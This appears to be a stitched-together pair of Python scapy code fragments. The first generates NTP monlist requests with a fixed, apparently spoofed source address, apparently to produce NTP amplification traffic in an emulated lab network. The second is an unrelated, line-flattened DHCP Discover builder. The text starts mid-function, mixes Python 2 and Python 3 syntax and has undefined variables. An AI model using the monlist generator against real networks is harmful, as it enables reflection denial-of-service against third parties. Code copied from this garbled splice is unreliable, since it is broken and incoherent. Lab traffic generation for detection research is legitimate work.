print("send {} IPv{} packts use {} sec".format(cnt, ipVer, t_span))
return iface
def send_random_traffic(num_of_messages):
NTP_MONLIST_REQUEST = "\x17\x00\x03\x2a" + "\x00" * 4
dst_mac = None
src_ip = None
dst_ip = None
legitimate_pkts = 0
spoofed_pkts = 0
total_pkts = 0
# h1 info
src_ip = '10.0.1.1'
src_mac = '00:00:00:00:01:01'
# Dest info
dst_ip = '10.0.1.3'
dst_mac = '00:00:00:00:01:99'
# Get name of eth0 interface
iface_eth0 = ''
for i in get_if_list():
if 'eth0' in i or 's0' in i:
iface_eth0 = i
mac_iface_eth0 = get_if_hwaddr(iface_eth0)
ip_addr_eth0 = get_ip_address(iface_eth0)
if len(mac_iface_eth0) < 1:
print("No interface for output")
sys.exit(1)
# Send request and sleep for some time
N = int(num_of_messages)
for i in range(N):
port = random.randint(1024, 65535)
p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip)
p = p / UDP(dport=123, sport=port) / NTP(NTP_MONLIST_REQUEST)
print p.show()
sendp(p, iface=iface_eth0, loop=0)
total_pkts += 1
print ''
print "Sent %s packets in total" % total_pkts
""" A very basic script to send a DHCP Discover message. Capture the packages to see what's wrong. """ import scapy from scapy.sendrecv import sendp, sniff from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP # data link layer ethernet = Ether() ethernet.show() ethernet.dst = "ff:ff:ff:ff:ff:ff" # network layer ip = IP() ip.show() ip.dst = "255.255.255.255" # transport layer udp = UDP() udp.show() udp.sport = 68 udp.dport = 67 # application layer bootp = BOOTP() bootp.show() bootp.flags = 1 dhcp = DHCP() dhcp.show()
